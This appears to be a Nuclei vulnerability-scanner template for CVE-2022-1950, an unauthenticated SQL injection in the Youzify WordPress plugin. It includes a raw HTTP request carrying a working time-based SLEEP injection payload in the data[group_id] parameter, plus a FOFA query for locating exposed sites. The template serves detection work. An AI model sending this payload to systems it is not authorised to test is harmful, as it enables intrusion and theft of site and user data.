id: CVE-2022-1950

info:
  name: Youzify < 1.2.0 - Unauthenticated SQLi
  author: DhiyaneshDK
  severity: critical
  description: |
    The Youzify WordPress plugin before 1.2.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection
  impact: |
    Unauthenticated attackers can execute time-based blind SQL injection via AJAX actions to extract database contents, potentially exposing all Youzify media and user data.
  remediation: Fixed in 1.2.0
  reference:
    - https://wpscan.com/vulnerability/4352283f-dd43-4827-b417-0c55d0f4637d/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1950
    cwe-id: CWE-89
    epss-score: 0.59723
    epss-percentile: 0.983
    cpe: cpe:2.3:a:kainelabs:youzify:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: kainelabs
    product: youzify
    framework: wordpress
    fofa-query: body="/wp-content/plugins/youzify"
  tags: cve,cve2022,youzify,wp,wp-plugin,wordpress,sqli,time-based-sqli,vkev,vuln

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=youzify_media_pagination&data[type]=photos&page=1&data[group_id]=(SELECT 7958 FROM (SELECT(SLEEP(6)))XVfJ)

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 6'
          - 'contains(body, "youzify-media")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402201eec26744256f6be60c81e3f27fd958481c2235a60943a8245f7d4cdd19ed98a02200478a37fef280415a208d766d88151706bc35e6dcc6edca8f9f1c410fc856913:922c64590222798bb761d5b6d8e72950